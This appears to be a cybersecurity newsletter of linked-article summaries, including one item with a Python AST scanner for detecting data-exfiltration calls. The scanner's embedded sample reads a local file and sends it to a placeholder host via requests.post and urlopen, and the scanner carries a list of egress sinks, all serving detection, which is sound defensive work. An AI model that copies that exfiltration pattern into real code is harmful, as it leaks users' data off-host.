While security testing is crucial for protection, identifying security defects in Python-based software requires specialised knowledge. Most security testers lack the in-depth training on Python-specific nuances that is essential for performing effective security evaluations.
In today’s digital world, cybersecurity remains a critical concern. This applies equally to the consumption and creation of Python software: preventing vulnerabilities begins with a robust architecture. However, even well-written code—including that generated by AI—is not secure by default. Python Code Audit is a vital, open-source (FOSS) tool that should be an integral part of your workflow.
1 Towards Modeling Cybersecurity Behavior of Humans in Organisations
Humans are the defining factor in your security defence. You can spend vast sums on expensive security products, but ultimately, your users will find ways to bypass them. Under time pressure, most people become incredibly inventive at finding workarounds to move documents in or out of the system. Their goal isn’t to compromise security, but simply to do a good job and generate revenue for your company.
Do not blame your users; blame your architects. Ensure the human factor is thoroughly addressed through a robust security-by-design training programme. Training architects and developers to practise security-by-design consistently yields a higher return on investment than chasing the next “holy grail” cybersecurity product. This paper is designed for easy reading, supported by a clear, informative visual.
(Link)
2 OpenClaw is a Security Nightmare
Whatever you imagine could go wrong with OpenClaw, the reality is worse. OpenClaw is a self-hosted AI agent that runs on your own machine and can execute real actions on your behalf: shell commands, file operations, and network requests. It is powerful, and its security blast radius is effectively your entire system. OpenClaw is a delivery channel for malware.
(Link)
3 You should never use Cloudflare
I am no fan of Cloudflare and especially distrust governmental agencies using this service. It should be forbidden for public services. It harms your security and kills the privacy of your users. It is impossible to use the Cloudflare proxy without giving up end-to-end encryption of your data: Cloudflare terminates TLS and is a man-in-the-middle with access to the unencrypted content of all the traffic it proxies.
(Link)
4 The Seven Sins of European Digital Identity (EUDI)
Besides privacy concerns, the security model of the EUDI wallet component relies on the Trusted Execution Environment (TEE) layer provided by mobile OS manufacturers. This approach abandons the use of advanced cryptography in favour of compatibility with an API controlled by an oligopoly of foreign companies. All major players in the identity industry have long been aware of exploited vulnerabilities in mobile TEEs and—for very good reasons—do not rely on them. Nevertheless, current implementation plans for the EUDI appear to be heading towards a security nightmare, as all solid advice is being neglected.
(Link)
5 TLS ECH (Encrypted Client Hello)
Good security requires continuous learning, so you had better make it fun. This blog is a nice way to get (re)acquainted with the TLS ECH RFC (RFC 9849) in an easy way.
(Link)
6 Google is tracking you (even when you use DuckDuckGo)
Escaping Google’s tracking online is hard.
(Link)
7 Low-Level Software Security for Compiler Developers
Great open access book! It is freely available online without barriers such as mandatory registration. With software security becoming even more important in recent years, it is no surprise to see an ever increasing variety of security hardening features and mitigations against vulnerabilities implemented in compilers. This book aims to help developers of code generation tools such as JITs, compilers, linkers and assemblers understand these mitigations and implement them correctly.
(Link)
8 Data Exfiltration Detection in Python Code
In the modern digital economy, data is an organisation’s most valuable asset. When sensitive information falls into unauthorised hands, the consequences are often irreversible. Data egress occurs when information travels from your secure internal perimeter to an external destination. For Python code, that destination can be the public internet, a third-party cloud environment, a partner network, or a SaaS integration. Python Code Audit can now check Python code for data exfiltration constructs.
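To make the idea of a "data exfiltration construct" concrete, here is an added example of a small AST-based egress scanner. It is illustration code written for this newsletter, not Python Code Audit's own implementation or rule set: the sink table, the sample source and the reasons reported are constructed. It resolves import aliases (`import requests as r`, `from urllib.request import urlopen as fetch`) so that renamed sinks are still caught, and it also flags dynamic imports of egress-capable modules via `importlib.import_module`, a common way to hide a network call from a naive grep.

```python
"""Added example: minimal AST scanner for data-egress constructs in Python source.

Not part of Python Code Audit. The sink list below is a constructed, incomplete
illustration; a real ruleset would be far larger (DNS, cloud SDKs, subprocess
with curl/scp, ...).
"""
from __future__ import annotations

import ast
from dataclasses import dataclass

# Constructed rule table: fully qualified callables that open a channel off-host.
EGRESS_SINKS = {
    "socket.socket", "socket.create_connection",
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "http.client.HTTPConnection", "http.client.HTTPSConnection",
    "requests.get", "requests.post", "requests.put", "requests.Session",
    "smtplib.SMTP", "smtplib.SMTP_SSL", "ftplib.FTP",
}
# Modules whose *dynamic* import is itself suspicious (alias/grep evasion).
EGRESS_MODULES = {s.rsplit(".", 1)[0] for s in EGRESS_SINKS}
DYNAMIC_IMPORTERS = {"importlib.import_module"}


@dataclass(frozen=True)
class Finding:
    line: int
    sink: str
    reason: str


class EgressScanner(ast.NodeVisitor):
    """Tracks import aliases, then resolves every call to a dotted name."""

    def __init__(self) -> None:
        self.aliases: dict[str, str] = {}   # local name -> fully qualified name
        self.findings: list[Finding] = []

    def visit_Import(self, node: ast.Import) -> None:
        for a in node.names:
            if a.asname:                     # import urllib.request as ur
                self.aliases[a.asname] = a.name
            else:                            # import urllib.request -> 'urllib'
                top = a.name.split(".")[0]
                self.aliases[top] = top
        self.generic_visit(node)

    def visit_ImportFrom(self, node: ast.ImportFrom) -> None:
        prefix = f"{node.module}." if node.module else ""   # relative imports have no module
        for a in node.names:
            self.aliases[a.asname or a.name] = prefix + a.name
        self.generic_visit(node)

    def _qualname(self, func: ast.expr) -> str | None:
        """Resolve r.post / fetch / urllib.request.urlopen through the alias map."""
        parts: list[str] = []
        while isinstance(func, ast.Attribute):
            parts.append(func.attr)
            func = func.value
        if not isinstance(func, ast.Name):
            return None                      # e.g. open(p).read(): base is a Call
        base = self.aliases.get(func.id)
        if base is None:
            return None                      # builtins / locals are not tracked
        parts.append(base)
        return ".".join(reversed(parts))

    def visit_Call(self, node: ast.Call) -> None:
        name = self._qualname(node.func)
        if name in EGRESS_SINKS:
            self.findings.append(Finding(node.lineno, name, "direct egress call"))
        elif (name in DYNAMIC_IMPORTERS or
              (isinstance(node.func, ast.Name) and node.func.id == "__import__")):
            # Flag importlib.import_module("socket") / __import__("requests").
            if node.args and isinstance(node.args[0], ast.Constant):
                mod = node.args[0].value
                if isinstance(mod, str) and mod in EGRESS_MODULES:
                    self.findings.append(
                        Finding(node.lineno, mod, "dynamic import of egress-capable module"))
        self.generic_visit(node)


def scan_source(source: str, filename: str = "<string>") -> list[Finding]:
    scanner = EgressScanner()
    scanner.visit(ast.parse(source, filename))
    return scanner.findings


# Constructed sample: reads a local file and ships it out through aliased sinks.
SAMPLE_SOURCE = """\
import os
import requests as r
from urllib.request import urlopen as fetch
import importlib

def leak(path):
    data = open(path).read()
    r.post("https://example.invalid/collect", data=data)
    fetch("https://example.invalid/?q=" + data)
    sock_mod = importlib.import_module("socket")
    return os.path.getsize(path)
"""

if __name__ == "__main__":
    for f in scan_source(SAMPLE_SOURCE, "sample.py"):
        print(f"sample.py:{f.line}: {f.sink}: {f.reason}")
```

Running it on the embedded sample reports lines 8, 9 and 10. The scanner is deliberately first-order: it does not follow `getattr(module, name)` lookups, string-built module names, or data flow from the file read to the call, so a finding here means "egress construct present", not "exfiltration proven", and a clean result is not a guarantee of absence.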
(Link)
The Open Security newsletter is an overview of cyber security news with a core focus on openness. Pointing out what went wrong after a cyber security breach is easy. Designing good and simple measures is hard. So join the open Security Reference Architecture collaboration project to create better solutions together, or become a partner to support this project. Use our RSS or ATOM feed to follow Open Security News.
